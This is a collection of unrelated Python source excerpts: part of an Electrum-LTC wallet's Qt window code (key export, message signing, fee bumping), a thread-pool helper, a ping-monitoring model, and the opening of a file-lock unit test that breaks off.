lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(QLabel(_('Lightning')), 5, 0)
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum_ltc.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum_ltc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("litecoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_ltc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
scriptpubkey = bfh(bitcoin.address_to_script(addr))
outputs = [PartialTxOutput(scriptpubkey=scriptpubkey, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
threading.py
|
import threading
class Threader():
__author__ = "Lloyd Albin (lalbin@fredhutch.org, lloyd@thealbins.com)"
__version__ = "0.0.23"
__copyright__ = "Copyright (C) 2019 Fred Hutchinson Cancer Research Center"
from scharp_py_tools import scharp_logging
logger = scharp_logging.Logger()
MAX_THREADS = int('0')
main_thread = threading.main_thread()
def spawn_thread(self, methodName, *args, **kwargs):
self.logger.debug('Testing Process')
if (self.MAX_THREADS == int('0')):
methodName(*args, **kwargs)
else:
reuse_thread = False
self.logger.debug('Active Threads: %s', threading.active_count())
while not reuse_thread:
if (threading.active_count() <= self.MAX_THREADS):
self.logger.debug('start new worker thread')
t = threading.Thread(target=methodName, args=args, kwargs=kwargs)
t.start()
reuse_thread = True
def wait_for_all_threads(self):
for t in threading.enumerate():
if t is self.main_thread:
continue
self.logger.debug('joining %s', t.getName())
self.logger.debug('Active Threads: %s', threading.active_count())
t.join()
|
multi_ping_model.py
|
"""Continuously pings devices for troubleshooting"""
from pydispatch import dispatcher
from threading import Thread
import datetime
import os
import csv
from . import win_ping
class PingUnit:
def __init__(self, obj, path, logging=False):
self.obj = obj
self.ping_data = []
self.hostname = obj.hostname
self.serial = obj.serial
self.ip_address = obj.ip_address
self.mac_address = obj.mac_address
self.success = 0
self.failed = 0
self.path = path
self.logging = logging
self.log = f'device_{obj.ip_address}_time_{datetime.datetime.now().strftime("%H_%M_%S")}.csv'
dispatcher.connect(
self.on_incoming_ping,
signal="Incoming Ping",
sender=dispatcher.Any)
self.thread = self.start_thread(obj)
def on_incoming_ping(self, sender, data):
if data[0] == self.obj:
self.ping_data.append(self.set_ping_data(data[1]))
if data[1][2] == 'Yes':
self.success += 1
else:
self.failed += 1
if self.logging:
self.save_log()
def set_ping_data(self, ping_info):
"""Makes a ping data unit"""
return Ping_Data_Unit(
ping_info[0], # .strftime('%H:%M:%S.%f')
ping_info[1],
ping_info[2])
def save_log(self):
"""Save log to a file"""
log_path = os.path.join(self.path, 'ping_logs')
if not os.path.exists(log_path):
os.makedirs(log_path)
output_file = os.path.join(log_path, self.log)
with open(output_file, 'a') as log_file:
writer_csv = csv.writer(log_file, quoting=csv.QUOTE_ALL)
row = []
row.append(str(self.ping_data[-1].ping_time))
row.append(str(self.ping_data[-1].ms_delay))
row.append(str(self.ping_data[-1].success))
writer_csv.writerow(row)
def start_thread(self, obj):
"""Starts pinging ip_address"""
ping_thread = win_ping.WinPing(obj)
ping_thread.setDaemon(True)
ping_thread.start()
return ping_thread
def stop_thread(self):
self.thread.shutdown = True
self.thread.join()
class Ping_Data_Unit:
def __init__(self, ping_time, ms_delay, success):
self.ping_time = ping_time
self.ms_delay = ms_delay
self.success = success
class MultiPing_Model:
def __init__(self, path='.'):
self.path = path
self.ping_objects = []
self.logging = False
def add(self, device_list):
"""Adds an obj to be pinged"""
current_ip_addresses = []
for obj in self.ping_objects:
current_ip_addresses.append(obj.ip_address)
for obj in device_list:
# print 'compare: ', obj.ip_address, current_ip_addresses
if obj.ip_address not in current_ip_addresses:
new_obj = PingUnit(obj, self.path, self.logging)
self.ping_objects.append(new_obj)
dispatcher.send(signal='Ping Model Update',
sender=self.ping_objects)
# def add_items(self, device_list):
# """Adds new devices to the list"""
# self.clean_up()
# current_ip_addresses = []
# for obj in self.ping_objects:
# current_ip_addresses.append(obj.ip_address)
# for obj in device_list:
# # print 'compare: ', obj.ip_address, current_ip_addresses
# if obj.ip_address not in current_ip_addresses:
# new_obj = PingUnit(obj, self.path, self.logging)
# self.ping_objects.append(new_obj)
# dispatcher.send(signal='Ping Model Update',
# sender=self.ping_objects)
# def clean_up(self):
# for obj in self.ping_objects:
# if not obj.thread.isAlive():
# try:
# self.ping_objects.remove(obj)
# except:
# pass
def delete(self, item):
"""Removes an item from pinging"""
self.ping_objects.remove(item)
Thread(target=item.stop_thread).start()
def reset(self, item):
"""Resets the item"""
item.ping_data = []
item.success = 0
item.failed = 0
def toggle_logging(self):
"""Toggles logging"""
if self.logging:
for item in self.ping_objects:
item.logging = False
else:
for item in self.ping_objects:
item.logging = True
self.logging = not self.logging
def shutdown(self):
# to_shutdown = self.ping_objects
self.ping_objects = []
# for item in to_shutdown:
# item.stop_thread()
dispatcher.send(signal="Ping Shutdown")
def main():
"""Run stand alone"""
pass
if __name__ == '__main__':
main()
|
test_lock.py
|
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import shutil
import tempfile
import unittest
from multiprocessing import Manager, Process
from threading import Thread
from pants.process.lock import OwnerPrintingInterProcessFileLock
def hold_lock_until_terminate(path, lock_held, terminate):
lock = OwnerPrintingInterProcessFileLock(path)
lock.acquire()
lock_held.set()
# NOTE: We shouldn't ever wait this long, this is just to ensure
# we don't somehow leak child processes.
terminate.wait(60)
lock.release()
lock_held.clear()
class TestOwnerPrintingInterProcessFileLock(unittest.TestCase):
def setUp(self):
self.lock_dir = tempfile.mkdtemp()
self.lock_path = os.path.join(self.lock_dir, 'lock')
self.lock = OwnerPrintingInterProcessFileLock(self.lock_path)
self.manager = Manager()
self.lock_held = self.manager.Event()
self.terminate = self.manager.Event()
self.lock_process = Process(
target=hold_lock_until_terminate,
args=(self.lock_path, self.lock_held, self.terminate),
)
def tearDown(self):
self.terminate.set()
try:
shutil.rmtree(self.lock_dir)
except OSError:
pass
def test_non_blocking_attempt(self):
self.lock_process.start()
